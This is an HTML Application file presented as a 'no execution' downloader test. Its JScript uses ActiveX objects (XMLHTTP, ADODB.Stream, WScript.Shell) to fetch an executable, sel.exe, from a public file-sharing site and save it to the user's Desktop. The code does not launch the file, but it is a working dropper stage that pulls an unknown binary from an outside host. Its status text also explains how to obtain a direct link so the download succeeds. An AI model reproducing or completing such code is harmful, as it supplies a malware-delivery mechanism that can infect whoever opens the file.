<!-- saved from url=(0014)about:internet -->
<hta:application
    id="Downloader"
    applicationname="Simple Downloader Test"
    border="thin"
    caption="yes"
    showintaskbar="yes"
    singleinstance="yes"
    sysmenu="yes"
    windowstate="normal"
>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Download Test - No Execution</title>
    <style>
        body {
            font-family: Segoe UI, Consolas, monospace;
            background: #111;
            color: #0f0;
            padding: 25px;
            margin: 0;
            font-size: 14px;
        }
        h1 { color: #ff4444; }
        #status {
            background: #000;
            border: 1px solid #333;
            padding: 15px;
            min-height: 180px;
            white-space: pre-wrap;
            overflow: auto;
        }
        button {
            padding: 10px 25px;
            font-size: 15px;
            background: #006600;
            color: white;
            border: none;
            cursor: pointer;
            margin: 15px 0;
        }
        button:hover { background: #008800; }
    </style>
</head>

<body>

<h1>Test Downloader (Desktop only - no run)</h1>
<p>Attempts to download from: https://www.upload.ee/files/19029808/sel.exe.html<br>
<strong>Warning:</strong> This URL is NOT direct → you'll probably get HTML instead of .exe</p>

<button onclick="startDownload()">Start Download to Desktop</button>

<div id="status">Ready...</div>

<script language="JScript">
    function startDownload() {
        var url = "https://www.upload.ee/files/19029808/sel.exe.html";
        var status = document.getElementById("status");
        status.innerHTML = "Starting download attempt...\nURL: " + url + "\n";

        var shell = new ActiveXObject("WScript.Shell");
        var desktop = shell.SpecialFolders("Desktop");
        var filePath = desktop + "\\sel.exe";

        status.innerHTML += "Target: " + filePath + "\n\n";

        try {
            var xhr = new ActiveXObject("MSXML2.XMLHTTP.6.0");
            xhr.open("GET", url, false);
            xhr.send();

            status.innerHTML += "HTTP Status: " + xhr.Status + " " + xhr.statusText + "\n";
            status.innerHTML += "Content-Type: " + xhr.getResponseHeader("Content-Type") + "\n";
            status.innerHTML += "Content-Length: " + (xhr.getResponseHeader("Content-Length") || "unknown") + " bytes\n\n";

            if (xhr.Status == 200) {
                var stream = new ActiveXObject("ADODB.Stream");
                stream.Type = 1; // binary
                stream.Open();
                stream.Write(xhr.responseBody);
                stream.SaveToFile(filePath, 2); // 2 = overwrite
                stream.Close();

                status.innerHTML += "File saved to Desktop\\sel.exe\n\n";
                status.innerHTML += "Check file size: if only a few KB → it's the webpage HTML, not the real .exe\n";
                status.innerHTML += "You need the DIRECT link (from browser Network tab after clicking download).";
            } else {
                status.innerHTML += "Download failed (non-200 response).";
            }
        } catch(e) {
            status.innerHTML += "ERROR: " + e.message + "\n";
            status.innerHTML += "(Internet blocked? mshta restrictions? ActiveX disabled?)";
        }
    }
</script>

</body>
</html>
